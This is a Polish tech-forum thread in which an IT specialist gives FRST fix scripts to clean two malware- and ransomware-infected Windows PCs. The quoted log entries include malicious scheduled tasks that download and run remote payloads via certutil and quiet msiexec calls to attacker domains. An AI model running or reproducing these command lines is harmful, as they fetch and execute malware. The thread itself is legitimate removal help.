Elektroda.pl
Elektroda.pl
X

Search our partners

Find the latest content on electronic components. Datasheets.com
Elektroda.pl
Please add exception to AdBlock for elektroda.pl.
If you watch the ads, you support portal and users.

Prosba o sprawdzenie logow z FRST

cfirek 25 Jan 2019 20:22 537 9
  • #1
    cfirek
    Level 9  
    Od dłuższego czasu borykam się z problemem w IE z "https://newtab.club/". W firefoxie w miarę opanowana sytuacja i już nie wyskakuje, ale na IE widnieje. Dodatkowo laptop trochę wolno pracuje.

    Natomiast w drugim komputerze jest wręcz armagedon. Żona pościągała chyba wszystkie wirusy jakie są np. mail ru, foldershare, adult dating itp itd. Nie wiem za bardzo jak walczyć mam z tym bo nawet FRST, AdwCleaner nie jestem w stanie uruchomić... Firefox zwieszony, chrome to samo...Jakieś pomysły jak z tego wybrnąć?
  • Helpful post
    #2
    Kolobos
    IT specialist
    Uzyj AdwCleaner, opcja Scan/Szukaj i Clean/Usun: http://www.bleepingcomputer.com/download/adwcleaner/

    Wykonaj Fixlist.txt dla FRST:
    CloseProcesses:
    EmptyTemp:
    Task: {14C8562F-97B9-4FFB-B144-8BA5FAFE06D8} - \AutoPico Daily Restart -> Brak pliku <==== UWAGA
    Task: {A7E2B861-6AAB-4F1D-A3A9-568BFC18D6DD} - \Opera scheduled Autoupdate 2796787680 -> Brak pliku <==== UWAGA
    Task: {E15EDFDB-6AA4-446A-8E1B-16BECA766A9F} - \One System Care Monitor -> Brak pliku <==== UWAGA
    Hosts:
    HKU\S-1-5-21-1954492381-903631573-2443732531-1000\...\MountPoints2: H - H:\setup.exe
    HKU\S-1-5-21-1954492381-903631573-2443732531-1000\...\MountPoints2: {80ed18f0-cd94-11e5-918e-30f9eda9f0b9} - H:\setup.exe
    HKU\S-1-5-21-1954492381-903631573-2443732531-1000\...\MountPoints2: {80ed18f6-cd94-11e5-918e-30f9eda9f0b9} - H:\setup.exe
    HKU\S-1-5-21-1954492381-903631573-2443732531-1000\...\MountPoints2: {c6591538-3554-11e5-bfcd-30f9eda9f0b9} - G:\Setup.exe
    BootExecute: autocheck autochk * bootdelete
    GroupPolicy: Ograniczenia - Windows Defender <==== UWAGA
    GroupPolicy\User: Ograniczenia ? <==== UWAGA
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://newtab.club
    HKU\S-1-5-21-1954492381-903631573-2443732531-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://newtab.club
    HKU\S-1-5-21-1954492381-903631573-2443732531-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
    URLSearchHook: HKU\S-1-5-21-1954492381-903631573-2443732531-1000 - (Brak nazwy) - {2C6A44CB-AD42-4731-A544-3FBD3D83AB5B} - Brak pliku
    SearchScopes: HKLM-x32 -> DefaultScope - brak wartości
    SearchScopes: HKU\S-1-5-21-1954492381-903631573-2443732531-1000 -> DefaultScope {2C6A44CB-AD42-4731-A544-3FBD3D83AB5B} URL =
    SearchScopes: HKU\S-1-5-21-1954492381-903631573-2443732531-1000 -> {2C6A44CB-AD42-4731-A544-3FBD3D83AB5B} URL =
    FF SearchPlugin: C:\Users\kamisia\AppData\Roaming\Mozilla\Firefox\Profiles\zgvzhvpr.default\searchplugins\cdnsearch.xml [2018-12-07]
    CHR HKLM-x32\...\Chrome\Extension: [ofoeigeaodhbjogdigckajfhjbonaofg] - hxxps://clients2.google.com/service/update2/crx
    S2 memudrv; \??\D:\Program Files\Microvirt\MEmuHyperv\MEmuDrv.sys [X]
    S3 TTDrv; \??\D:\KOPLAYER\vbox\TTDrv.sys [X]
    2018-07-20 13:10 - 2018-07-20 13:10 - 007631872 _____ () C:\Users\kamisia\AppData\Local\agent.dat
    2018-07-20 13:10 - 2018-07-20 13:10 - 000070896 _____ () C:\Users\kamisia\AppData\Local\Config.xml
    2018-07-20 13:08 - 2018-07-20 13:08 - 000140800 _____ () C:\Users\kamisia\AppData\Local\installer.dat
    2015-07-26 06:22 - 2015-07-26 06:22 - 000000027 _____ () C:\Users\kamisia\AppData\Local\killertool.log
    2018-07-20 13:10 - 2018-07-20 13:10 - 000005568 _____ () C:\Users\kamisia\AppData\Local\md.xml
    2018-07-20 13:10 - 2018-07-20 13:10 - 000126464 _____ () C:\Users\kamisia\AppData\Local\noah.dat
    2018-09-28 04:52 - 2018-09-28 04:52 - 000000000 _____ () C:\Users\kamisia\AppData\Local\oobelibMkey.log
    2018-07-20 13:08 - 2018-07-20 20:57 - 000929792 _____ () C:\Users\kamisia\AppData\Local\sham.db
    2018-07-20 13:10 - 2018-07-20 13:10 - 001989243 _____ () C:\Users\kamisia\AppData\Local\Singlezap.tst
    2018-07-20 13:09 - 2018-07-20 13:09 - 000278509 _____ () C:\Users\kamisia\AppData\Local\Super-Trax.bin
    2018-07-20 13:10 - 2018-07-20 13:10 - 001895384 _____ () C:\Users\kamisia\AppData\Local\Tinfan.bin
    2018-07-20 13:10 - 2018-07-20 13:10 - 000032038 _____ () C:\Users\kamisia\AppData\Local\uninstall_temp.ico


    Zrob pelny skan przy pomocy Mbam i usun to co wykryje:
    http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/

    Zamiesc logi z drugiego komputera.
  • #4
    Kolobos
    IT specialist
    Wykonaj Fixlist.txt dla FRST:
    CloseProcesses:
    EmptyTemp:
    Task: {1E197D51-5BAE-401F-993C-BD49952B9A5B} - System32\Tasks\Opera scheduled Autoupdate 1533523119 => C:\Users\cwk\AppData\Roaming\Microsoft\Windows\rcdtacsv\wiihwtee.exe [2018-12-28] (
    Task: {5847E149-184E-45CE-969D-7176DD68FC83} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2019-01-25] () <==== UWAGA
    Task: {657D5EBA-B476-44F5-9561-0D1A69775D0E} - System32\Tasks\{9111EF1C-634F-DAFD-948A-F89F01B046F8} => "msiexec" /package hxxps://refreshnerer711.info/h2nBIK6F46S5.502 -q
    Task: {914C4F6B-ECBF-4EAE-ABC2-FF6CA707BA78} - System32\Tasks\YoutubeDownloader => C:\Users\cwk\AppData\Roaming\YoutubeDownloader\python\pythonw.exe [2018-11-02] (Python Software Foundation) <==== UWAGA
    Task: {9555ECF0-9AC2-4F88-8D68-73DE0F701302} - System32\Tasks\Opera scheduled Autoupdate 2796787680 => C:\Users\cwk\AppData\Roaming\Microsoft\Windows\vuhbawbu\wiihwtee.exe [2018-12-28] ()
    Task: {BFF58558-19C8-4893-B40D-E2D2A5886933} - System32\Tasks\YoutubeDownloader_upd => C:\Users\cwk\AppData\Roaming\YoutubeDownloader_upd\python\pythonw.exe [2018-11-02] (Python Software Foundation) <==== UWAGA
    Task: {CACB0DC4-9071-4C5E-8395-DB806B42FC49} - System32\Tasks\{90961E03-2B4E-5201-B585-F7B0126D4440} => "msiexec.exe" /q /i hxxps://refreshnerer711rb.info/j8Hf56z63IbG.KFZ
    Task: {D7892A5C-CABF-4C69-BF6C-C8D1806601A8} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://headbuild.info/app/app.exe C:\Users\cwk\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\cwk\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA
    2019-01-25 19:36 - 2019-01-25 19:36 - 000274944 _____ () C:\Program Files\Mozilla Firefox\HYYGFVCIKZVYBS6\jJd16jnH-Y.exe
    2019-01-25 19:37 - 2019-01-25 19:37 - 004525568 _____ () C:\Windows\rss\csrss.exe
    Hosts:
    () C:\Program Files\Mozilla Firefox\HYYGFVCIKZVYBS6\jJd16jnH-Y.exe
    (SY) C:\Program Files\42NAB5248Q\42NAB5248.exe
    (LiteManagerTeam) C:\Users\cwk\AppData\Local\Temp\1900.tmp.exe
    (Python Software Foundation) C:\Users\cwk\AppData\Roaming\YoutubeDownloader_upd\python\python.exe
    (Python Software Foundation) C:\Users\cwk\AppData\Roaming\YoutubeDownloader\python\python.exe
    () C:\Windows\rss\csrss.exe
    HKLM\...\RunOnce: [OMEWPRODUCT_] => C:\Program Files\Mozilla Firefox\HYYGFVCIKZVYBS6\Chm3dtyç6s.exe [223744 2019-01-25] () <==== UWAGA
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
    HKU\S-1-5-21-469818906-28220939-695786958-1000\...\Run: [jJd16jnH-Y.exe] => C:\Program Files\Mozilla Firefox\HYYGFVCIKZVYBS6\jJd16jnH-Y.exe [274944 2019-01-25] ()
    HKU\S-1-5-21-469818906-28220939-695786958-1000\...\Run: [YoutubeDownloader_upd] => C:\Users\cwk\AppData\Roaming\YoutubeDownloader_upd\python\pythonw.exe [95904 2018-11-02] (Python Software Foundation) <==== UWAGA
    HKU\S-1-5-21-469818906-28220939-695786958-1000\...\Run: [YoutubeDownloader] => C:\Users\cwk\AppData\Roaming\YoutubeDownloader\python\pythonw.exe [95904 2018-11-02] (Python Software Foundation) <==== UWAGA
    HKU\S-1-5-21-469818906-28220939-695786958-1000\...\Run: [PHP15RVN97IR9I8] => C:\Program Files\42NAB5248Q\42NAB5248.exe [829440 2019-01-25] (SY)
    HKU\S-1-5-21-469818906-28220939-695786958-1000\...\Run: [1900.tmp] => C:\Users\cwk\AppData\Local\Temp\1900.tmp.exe [672040 2019-01-25] (LiteManagerTeam) <==== UWAGA
    HKU\S-1-5-21-469818906-28220939-695786958-1000\...\Run: [WispySky] => C:\Windows\rss\csrss.exe [4525568 2019-01-25] () <==== UWAGA
    Startup: C:\Users\cwk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rcdtacsv.lnk [2019-01-26]
    ShortcutTarget: rcdtacsv.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
    Startup: C:\Users\cwk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vuhbawbu.lnk [2019-01-26]
    ShortcutTarget: vuhbawbu.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
    GroupPolicy: Ograniczenia - Windows Defender <==== UWAGA
    GroupPolicy\User: Ograniczenia ? <==== UWAGA
    CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA
    HKU\S-1-5-21-469818906-28220939-695786958-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...eXYsqlBmViQaMmBW0pLkT7eGQKYzBjX01datzk&q={searchTerms}
    HKU\S-1-5-21-469818906-28220939-695786958-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61...iFIoAwCyZc_qcRFwP0rzPFG8YFfKOgms8bObgqzN1FkYC
    HKU\S-1-5-21-469818906-28220939-695786958-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
    SearchScopes: HKLM-x32 -> DefaultScope - brak wartości
    FF user.js: detected! => C:\Users\cwk\AppData\Roaming\Mozilla\Firefox\Profiles\uy55ed3f.default\user.js [2017-06-30]
    FF NewTab: Mozilla\Firefox\Profiles\uy55ed3f.default -> file:///C:/ProgramData/Polygens/ff.NT
    FF NewTabOverride: Mozilla\Firefox\Profiles\uy55ed3f.default -> Enabled: pavel.sherbakov(malpa)gmail.com
    FF Extension: (Firefox Protection) - C:\Users\cwk\AppData\Roaming\Mozilla\Firefox\Profiles\uy55ed3f.default\Extensions\{ab10d63e-3096-4492-ab0e-5edcf4baf988} [2019-01-23] [Brak podpisu cyfrowego]
    FF Extension: (Foxy Gestures) - C:\Users\cwk\AppData\Roaming\Mozilla\Firefox\Profiles\uy55ed3f.default\Extensions\{e839c3f9-298e-4cd0-99e0-464431cb7c34}.xpi [2019-01-23]
    C:\Users\cwk\AppData\Roaming\Mozilla\Firefox\Profiles\uy55ed3f.default\Extensions\{e839c3f9-298e-4cd0-99e0-464431cb7c34}.xpi
    CHR HomePage: Default -> inline.go.mail.ru
    CHR StartupUrls: Default -> "hxxp://mail.ru/cnt/10445?gp=834408"
    CHR DefaultSearchURL: Default -> hxxp://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7B9BB0A375-B70D-4FB8-AACB-2BA5774E3A7A%7D&gp=811570
    CHR DefaultSearchKeyword: Default -> go.mail.ru
    CHR DefaultSuggestURL: Default -> hxxp://suggests.go.mail.ru/chrome?q={searchTerms}
    C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjeadgnobnacllefgoianipbiihbndcl
    CHR Extension: (chrome_filter) - C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjeadgnobnacllefgoianipbiihbndcl [2019-01-26]
    C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\gndoicapfdaldiokbcdnllfhnapokcbk
    CHR Extension: (Домашняя страница Mail.Ru) - C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\gndoicapfdaldiokbcdnllfhnapokcbk [2019-01-23]
    C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\ikpcpgklmefncbfgbdifkaphbaapgafh
    CHR Extension: (Пульс) - C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\ikpcpgklmefncbfgbdifkaphbaapgafh [2019-01-23]
    C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdhpacfhljhcombkalcmkahkhodpkbim
    CHR Extension: (Mail.Ru) - C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdhpacfhljhcombkalcmkahkhodpkbim [2019-01-23]
    C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmeinlfojlcegblpogpjbhipmonclejh
    CHR Extension: (Bazz Search SafeFinder) - C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmeinlfojlcegblpogpjbhipmonclejh [2019-01-25]
    C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\SystemTable\1.2_0
    CHR Extension: (System Table) - C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\SystemTable\1.2_0 [2019-01-25]
    CHR HKLM-x32\...\Chrome\Extension: [gndoicapfdaldiokbcdnllfhnapokcbk] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [ikpcpgklmefncbfgbdifkaphbaapgafh] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [mdhpacfhljhcombkalcmkahkhodpkbim] - hxxps://clients2.google.com/service/update2/crx
    S2 Smart Monitoring; C:\Program Files (x86)\SmartData\svchost_ms.exe [2204672 2019-01-25] () [Brak podpisu cyfrowego]
    R1 5759B9013484; C:\Windows\5759B9013484.sys [621928 2019-01-25] (VideoDriver)
    R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== UWAGA (zerobajtowy plik/folder)
    R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== UWAGA (zerobajtowy plik/folder)
    R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2019-01-26] () [Brak podpisu cyfrowego]
    2019-01-26 16:58 - 2019-01-26 16:58 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
    2019-01-26 16:58 - 2019-01-26 16:58 - 000003478 _____ C:\Windows\System32\Tasks\ScheduledUpdate
    2019-01-25 20:19 - 2019-01-26 16:56 - 000000000 ____D C:\AdwCleaner
    2019-01-25 19:40 - 2019-01-26 16:58 - 000003178 _____ C:\Windows\System32\Tasks\csrss
    2019-01-25 19:40 - 2019-01-25 19:40 - 006161408 _____ C:\Users\cwk\AppData\Local\dump007.dat
    2019-01-25 19:40 - 2019-01-25 19:40 - 000000009 _____ C:\Users\cwk\rstr2.ini
    2019-01-25 19:40 - 2019-01-25 19:40 - 000000000 ____D C:\Users\cwk\AppData\LocalLow\MAL
    2019-01-25 19:39 - 2019-01-25 19:39 - 000000266 __RSH C:\Users\cwk\ntuser.pol
    2019-01-25 19:38 - 2019-01-25 19:38 - 000000000 ____D C:\Program Files (x86)\Lavasoft
    2019-01-25 19:38 - 2019-01-25 19:38 - 000000000 ____D C:\Program Files (x86)\eJBlAwaaSdTwMIVB
    2019-01-25 19:37 - 2019-01-26 16:50 - 000003444 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 2796787680
    2019-01-25 19:37 - 2019-01-25 19:38 - 000000000 ____D C:\Program Files (x86)\eWuDAKEgxIEaotatbUCTo
    2019-01-25 19:37 - 2019-01-25 19:37 - 007858688 _____ C:\Users\cwk\AppData\Local\agent.dat
    2019-01-25 19:37 - 2019-01-25 19:37 - 006860752 _____ C:\Users\cwk\AppData\Roaming\cbargat.exe.E
    2019-01-25 19:37 - 2019-01-25 19:37 - 006860752 _____ (NeoSoft Tools ) C:\Users\cwk\AppData\Roaming\cbargat.exe
    2019-01-25 19:37 - 2019-01-25 19:37 - 002036055 _____ C:\Users\cwk\AppData\Local\Zonedox.tst
    2019-01-25 19:37 - 2019-01-25 19:37 - 001895383 _____ C:\Users\cwk\AppData\Local\DingTamtone.bin
    2019-01-25 19:37 - 2019-01-25 19:37 - 000278509 _____ C:\Users\cwk\AppData\Local\Zunzamity.tst
    2019-01-25 19:37 - 2019-01-25 19:37 - 000126464 _____ C:\Users\cwk\AppData\Local\noah.dat
    2019-01-25 19:37 - 2019-01-25 19:37 - 000115200 _____ C:\Users\cwk\AppData\Roaming\lakric.exe.E
    2019-01-25 19:37 - 2019-01-25 19:37 - 000115200 _____ C:\Users\cwk\AppData\Roaming\lakric.exe
    2019-01-25 19:37 - 2019-01-25 19:37 - 000070896 _____ C:\Users\cwk\AppData\Local\Config.xml
    2019-01-25 19:37 - 2019-01-25 19:37 - 000005568 _____ C:\Users\cwk\AppData\Local\md.xml
    2019-01-25 19:37 - 2019-01-25 19:37 - 000000000 ____D C:\ProgramData\Lavasoft
    2019-01-25 19:37 - 2019-01-25 19:37 - 000000000 ____D C:\Program Files\42NAB5248Q
    2019-01-25 19:37 - 2019-01-25 19:36 - 001632256 _____ (TODO: <Company name>) C:\Users\cwk\AppData\Local\Zunzamity.exe
    2019-01-25 19:37 - 2019-01-25 19:36 - 001632256 _____ (TODO: <Company name>) C:\Users\cwk\AppData\Local\Zonedox.exe
    2019-01-25 19:36 - 2019-01-26 16:50 - 000003444 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1533523119
    2019-01-25 19:36 - 2019-01-25 19:42 - 000722944 _____ C:\Users\cwk\AppData\Local\sham.db
    2019-01-25 19:36 - 2019-01-25 19:41 - 000000000 ____D C:\Users\cwk\AppData\Roaming\Kodobi
    2019-01-25 19:36 - 2019-01-25 19:39 - 000002676 __RSH C:\ProgramData\ntuser.pol
    2019-01-25 19:36 - 2019-01-25 19:39 - 000000000 ____D C:\Users\cwk\AppData\Roaming\YoutubeDownloader_upd
    2019-01-25 19:36 - 2019-01-25 19:39 - 000000000 ____D C:\Users\cwk\AppData\Roaming\YoutubeDownloader
    2019-01-25 19:36 - 2019-01-25 19:36 - 000621928 _____ (VideoDriver) C:\Windows\5759B9013484.sys
    2019-01-25 19:36 - 2019-01-25 19:36 - 000140800 _____ C:\Users\cwk\AppData\Local\installer.dat
    2019-01-25 19:36 - 2019-01-25 19:36 - 000012489 _____ C:\Users\cwk\Desktop\lame 3.97 exe download
    2019-01-25 19:36 - 2019-01-25 19:36 - 000003806 _____ C:\Windows\System32\Tasks\YoutubeDownloader_upd
    2019-01-25 19:36 - 2019-01-25 19:36 - 000003584 _____ C:\Windows\System32\Tasks\{9111EF1C-634F-DAFD-948A-F89F01B046F8}
    2019-01-25 19:36 - 2019-01-25 19:36 - 000003382 _____ C:\Windows\System32\Tasks\{90961E03-2B4E-5201-B585-F7B0126D4440}
    2019-01-25 19:36 - 2019-01-25 19:36 - 000003344 _____ C:\Windows\System32\Tasks\YoutubeDownloader
    2019-01-25 19:36 - 2019-01-25 19:36 - 000001134 _____ C:\Users\cwk\Desktop\foldershare.lnk
    2019-01-25 19:36 - 2019-01-25 19:36 - 000001086 _____ C:\Users\cwk\Desktop\Adult Dating.lnk
    2019-01-25 19:36 - 2019-01-25 19:36 - 000001078 _____ C:\Users\cwk\Desktop\Win iPhone X.lnk
    2019-01-25 19:36 - 2019-01-25 19:36 - 000000003 _____ C:\Users\cwk\AppData\Local\wbem.ini
    2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 ____D C:\Users\cwk\AppData\Roaming\Python
    2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 ____D C:\Users\cwk\AppData\Roaming\pg
    2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 ____D C:\Users\cwk\AppData\Roaming\loweregcleaner
    2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 ____D C:\ProgramData\{5CBE66EB-DA92-3452-EAC7-D1B8EA2088E9}
    2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 ____D C:\ProgramData\{0484EB58-5721-6C68-594A-EBE059ADB2B1}
    2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 ____D C:\Program Files (x86)\IFSds
    2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 ____D C:\Program Files (x86)\foldershare
    2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 _____ C:\Users\cwk\AppData\Roaming\sent.dat
    2019-01-25 19:26 - 2019-01-25 19:27 - 000000000 ____D C:\Program Files (x86)\Audio Identifier
    2019-01-25 19:26 - 2019-01-25 19:26 - 001427014 _____ (BitAttack) C:\Users\cwk\Downloads\AudioIdentifier_setup.exe
    2019-01-25 19:26 - 2019-01-25 19:26 - 000000000 ____D C:\Users\cwk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Audio Identifier
    2019-01-25 19:26 - 2019-01-25 19:26 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Audio Identifier
    2019-01-23 17:48 - 2019-01-23 17:48 - 000000000 ____D C:\Users\cwk\licman
    2019-01-23 17:47 - 2019-01-23 17:47 - 000000000 ____D C:\Users\cwk\Downloads\Ontrack EasyRecovery Pro 11.1.0 with Keygen [usoft24.com]
    2019-01-23 17:46 - 2019-01-23 17:47 - 020984538 _____ C:\Users\cwk\Downloads\Ontrack EasyRecovery Pro 11.1.0 with Keygen [usoft24.com].rar
    2019-01-23 17:42 - 2019-01-23 17:42 - 002859896 _____ (Copyright © 2015 eSupport.com • All Rights Reserved ) C:\Users\cwk\Downloads\undeleteplus_setup.exe
    2019-01-23 17:42 - 2019-01-23 17:42 - 000000000 ____D C:\Program Files (x86)\eSupport.com
    2019-01-23 17:32 - 2019-01-23 17:32 - 000000000 _____ C:\ProgramData\1.txt
    2019-01-23 17:31 - 2019-01-25 19:36 - 000000000 ____D C:\Program Files (x86)\SmartData
    1601-01-03 21:26 - 1601-01-03 21:26 - 000186368 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\uAmPo.exe
    1601-01-03 21:26 - 1601-01-03 21:26 - 000073216 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\wfjYYuOw.exe
    1601-01-03 21:26 - 1601-01-03 21:26 - 000073216 ____N (Microsoft Corporation) C:\Users\cwk\AppData\Roaming\AyeUuiOSi.exe
    2019-01-25 19:37 - 2019-01-25 19:37 - 006860752 _____ (NeoSoft Tools ) C:\Users\cwk\AppData\Roaming\cbargat.exe
    2019-01-25 19:37 - 2019-01-25 19:37 - 006860752 _____ () C:\Users\cwk\AppData\Roaming\cbargat.exe.E
    2019-01-25 19:37 - 2019-01-25 19:37 - 000115200 _____ () C:\Users\cwk\AppData\Roaming\lakric.exe
    2019-01-25 19:37 - 2019-01-25 19:37 - 000115200 _____ () C:\Users\cwk\AppData\Roaming\lakric.exe.E
    2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 _____ () C:\Users\cwk\AppData\Roaming\sent.dat
    2019-01-25 19:37 - 2019-01-25 19:37 - 007858688 _____ () C:\Users\cwk\AppData\Local\agent.dat
    2019-01-25 19:37 - 2019-01-25 19:37 - 000070896 _____ () C:\Users\cwk\AppData\Local\Config.xml
    2019-01-25 19:37 - 2019-01-25 19:37 - 001895383 _____ () C:\Users\cwk\AppData\Local\DingTamtone.bin
    2019-01-25 19:40 - 2019-01-25 19:40 - 006161408 _____ () C:\Users\cwk\AppData\Local\dump007.dat
    2019-01-25 19:36 - 2019-01-25 19:36 - 000140800 _____ () C:\Users\cwk\AppData\Local\installer.dat
    2019-01-25 19:37 - 2019-01-25 19:37 - 000005568 _____ () C:\Users\cwk\AppData\Local\md.xml
    2019-01-25 19:37 - 2019-01-25 19:37 - 000126464 _____ () C:\Users\cwk\AppData\Local\noah.dat
    2019-01-25 19:36 - 2019-01-25 19:42 - 000722944 _____ () C:\Users\cwk\AppData\Local\sham.db
    2019-01-25 19:37 - 2019-01-25 19:37 - 000032038 _____ () C:\Users\cwk\AppData\Local\uninstall_temp.ico
    2019-01-25 19:36 - 2019-01-25 19:36 - 000000003 _____ () C:\Users\cwk\AppData\Local\wbem.ini
    2019-01-25 19:37 - 2019-01-25 19:36 - 001632256 _____ (TODO: <Company name>) C:\Users\cwk\AppData\Local\Zonedox.exe
    2019-01-25 19:37 - 2019-01-25 19:37 - 002036055 _____ () C:\Users\cwk\AppData\Local\Zonedox.tst
    2019-01-25 19:37 - 2019-01-25 19:36 - 001632256 _____ (TODO: <Company name>) C:\Users\cwk\AppData\Local\Zunzamity.exe
    2019-01-25 19:37 - 2019-01-25 19:37 - 000278509 _____ () C:\Users\cwk\AppData\Local\Zunzamity.tst
    C:\Program Files\Mozilla Firefox\HYYGFVCIKZVYBS6\Chm3dtyç6s.exe
    C:\Users\cwk\AppData\Roaming\YoutubeDownloader_upd\python\pythonw.exe
    C:\Users\cwk\AppData\Roaming\YoutubeDownloader\python\pythonw.exe
    C:\Users\cwk\AppData\Local\Temp\1900.tmp.exe
    C:\Windows\rss\csrss.exe

    Wykonaj Fixlist.txt ponownie z poziomu WinRe:
    https://www.fixitpc.pl/topic/4414-diagnostyka-infekcji-na-niestartuj%C4%85cych-windows/

    Po wykonaniu zamiesc nowe logi z FRST (wykonane juz z poziomu system), tylko zaznacz dodatkowo obcje Lista BCD.
  • #6
    Kolobos
    IT specialist
    Przy infekcji szyfrujacej pliki to normalne, o plikach mozesz raczej zapomniec.

    Widze, ze Lista BCD nie zadzialalo, zamiesc screen z msconfig z zakladki Rozruch.

    Odinstaluj CloudNet

    Wykonaj nowy Fixlist.txt dla FRST:
    CloseProcesses:
    Task: {3A76426B-A623-40CA-81A9-41E8CDF5CB93} - \csrss -> Brak pliku <==== UWAGA
    Task: {3EB9CFFA-35F0-49A0-9081-6DF8931151D1} - \Opera scheduled Autoupdate 2796787680 -> Brak pliku <==== UWAGA
    Task: {C5B2A3AD-9E12-4910-9413-51DAD4BA2027} - \ScheduledUpdate -> Brak pliku <==== UWAGA
    Task: {DFAA6C60-863C-4CD4-B368-2C762424A16C} - \Opera scheduled Autoupdate 1533523119 -> Brak pliku <==== UWAGA
    Task: {E018B339-11B8-4027-B424-99290EF4394A} - System32\Tasks\Microsoft LocalManager[Windows 7 Professional] => C:\ProgramData\{88137684-8813-8813-881376846686}\lsm.exe [2019-01-26] (MASTER.CURRENT.PANAMA.denmark.death.month]) <==== UWAGA
    2019-01-26 17:28 - 2019-01-26 17:28 - 001435136 ____H () C:\Windows\windefender.exe
    CMD: netsh advfirewall reset
    () C:\Windows\windefender.exe
    (EpicNet Inc.) C:\Users\cwk\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
    (MASTER.CURRENT.PANAMA.denmark.death.month]) C:\ProgramData\{88137684-8813-8813-881376846686}\lsm.exe
    (MASTER.CURRENT.PANAMA.denmark.death.month]) C:\ProgramData\{88137684-8813-8813-881376846686}\lsm.exe
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
    HKU\S-1-5-21-469818906-28220939-695786958-1000\...\Run: [CloudNet] => C:\Users\cwk\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-01-26] (EpicNet Inc.) <==== UWAGA
    R2 WinDefender; C:\Windows\windefender.exe [1435136 2019-01-26] ()
    2019-01-26 19:14 - 2019-01-31 16:22 - 000000000 ____D C:\Users\cwk\Desktop\FRST-OlderVersion
    2019-01-26 19:14 - 2019-01-26 19:14 - 000008946 _____ C:\Program Files\CPBGT-DECRYPT.txt
    2019-01-26 19:14 - 2019-01-26 19:14 - 000008946 _____ C:\Program Files (x86)\CPBGT-DECRYPT.txt
    2019-01-26 19:14 - 2019-01-26 19:14 - 000003494 _____ C:\Windows\System32\Tasks\Microsoft LocalManager[Windows 7 Professional]
    2019-01-26 19:14 - 2019-01-26 19:14 - 000000000 __SHD C:\ProgramData\{88137684-8813-8813-881376846686}
    2019-01-26 19:13 - 2019-01-26 19:13 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
    2019-01-26 19:13 - 2019-01-26 19:13 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
    2019-01-26 19:13 - 2019-01-26 19:13 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
    2019-01-26 19:13 - 2019-01-26 19:13 - 000008946 _____ C:\Users\cwk\CPBGT-DECRYPT.txt
    2019-01-26 19:13 - 2019-01-26 19:13 - 000008946 _____ C:\Users\cwk\AppData\Local\CPBGT-DECRYPT.txt
    2019-01-26 19:13 - 2019-01-26 19:13 - 000008946 _____ C:\Users\cwk\AppData\CPBGT-DECRYPT.txt
